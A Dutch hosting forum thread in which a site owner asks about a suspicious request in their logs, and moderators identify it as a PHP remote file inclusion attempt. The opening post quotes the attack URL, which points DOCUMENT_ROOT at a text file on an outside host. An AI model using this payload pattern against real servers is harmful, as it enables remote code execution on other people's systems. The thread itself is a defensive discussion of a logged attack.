Likes Likes:  0
Resultaten 1 tot 8 van de 8
Geen

Onderwerp: Exploit in php?

  1. #1
    Exploit in php?
    geregistreerd gebruiker
    170 Berichten
    Ingeschreven
    10/04/04

    Locatie
    Enschede

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: 37122204
    Ondernemingsnummer: nvt

    Thread Starter

    Exploit in php?

    Ik kwam vandaag de volgende URL tegen?
    /products/?id=34/?_SERVER[DOCUMENT_ROOT]=http://sito.blackdrag0n.net/Cartoon/idnew.txt?

    Dit lijkt op een exploit voor php. Is er iemand bekend met een exploit?

    Bij mij heeft het dus geen effect gehad, maar ik kan me voorstellen dat er bij een iets andere configuratie wel problemen zouden zijn.

  2. #2
    Exploit in php?
    moderator
    7.022 Berichten
    Ingeschreven
    29/07/03

    Locatie
    Nijmegen

    Post Thanks / Like
    Mentioned
    12 Post(s)
    Tagged
    0 Thread(s)
    175 Berichten zijn liked


    Naam: Mike
    Bedrijf: admin.nu
    URL: www.admin.nu
    Registrar SIDN: Ja
    KvK nummer: 09139651

    niet in php, maar in de code van het betreffende product
    "Zo zijn ook wij één leverancier. Dé leverancier in gedegen Linux kennis, wanneer jij dat nodig hebt."
    Boek je admin vandaag nog via : www.admin.nu
    Gevestigd in Nederland en Moldavië

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  3. #3
    Exploit in php?
    moderator
    5.444 Berichten
    Ingeschreven
    12/09/05

    Locatie
    Zuid Holland

    Post Thanks / Like
    Mentioned
    10 Post(s)
    Tagged
    0 Thread(s)
    110 Berichten zijn liked


    Naam: Stijn
    KvK nummer: 14074337

    Er zijn wat pauper producten die daar kwetsbaar voor zijn. Zo'n "aanval" krijgen wij elke dag wel tienmaal op de site. IPs worden netjes gepermbanned.
    De standpunten en meningen op dit discussieforum zijn persoonlijk van aard en vertegenwoordigen in geen geval eventuele officiële standpunten van derden.
    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  4. #4
    Exploit in php?
    geregistreerd gebruiker
    170 Berichten
    Ingeschreven
    10/04/04

    Locatie
    Enschede

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: 37122204
    Ondernemingsnummer: nvt

    Thread Starter
    Het is een eigen script, dus het is geen standaard product. Enig idee welk product hier dan kwetsbaar voor zou zijn?

  5. #5
    Exploit in php?
    moderator
    7.022 Berichten
    Ingeschreven
    29/07/03

    Locatie
    Nijmegen

    Post Thanks / Like
    Mentioned
    12 Post(s)
    Tagged
    0 Thread(s)
    175 Berichten zijn liked


    Naam: Mike
    Bedrijf: admin.nu
    URL: www.admin.nu
    Registrar SIDN: Ja
    KvK nummer: 09139651

    zoek maar op remote file inclusion exploit
    "Zo zijn ook wij één leverancier. Dé leverancier in gedegen Linux kennis, wanneer jij dat nodig hebt."
    Boek je admin vandaag nog via : www.admin.nu
    Gevestigd in Nederland en Moldavië

    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  6. #6
    Exploit in php?
    Hostingvisions
    1.042 Berichten
    Ingeschreven
    18/01/05

    Locatie
    Katwijk

    Post Thanks / Like
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    13 Berichten zijn liked


    Bedrijf: Hostingvisions
    Functie: Eigenaar
    Registrar SIDN: Nee
    KvK nummer: 27313947

    Het enige wat dat script doet, is gegevens over de server opslaan

  7. #7
    Exploit in php?
    moderator
    5.444 Berichten
    Ingeschreven
    12/09/05

    Locatie
    Zuid Holland

    Post Thanks / Like
    Mentioned
    10 Post(s)
    Tagged
    0 Thread(s)
    110 Berichten zijn liked


    Naam: Stijn
    KvK nummer: 14074337

    Citaat Oorspronkelijk geplaatst door Ahmed Bekijk Berichten
    Het enige wat dat script doet, is gegevens over de server opslaan
    Dit script misschien wel, maar zodra ze dat kunnen, kunnen ze ook andere code uitvoeren op het systeem.
    De standpunten en meningen op dit discussieforum zijn persoonlijk van aard en vertegenwoordigen in geen geval eventuele officiële standpunten van derden.
    Lees hier de webhostingtalk.nl forum regels en voorwaarden!

  8. #8
    Exploit in php?
    geregistreerd gebruiker
    170 Berichten
    Ingeschreven
    10/04/04

    Locatie
    Enschede

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: 37122204
    Ondernemingsnummer: nvt

    Thread Starter
    Ja, dat zijn bekende exploits.
    Wat ik meer opvallend vond, is de poging om $_SERVER['DOCUMENT_ROOT'] een andere waarde te geven. Dat lijkt me alleen mogelijk als PHP dat toe staat.

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics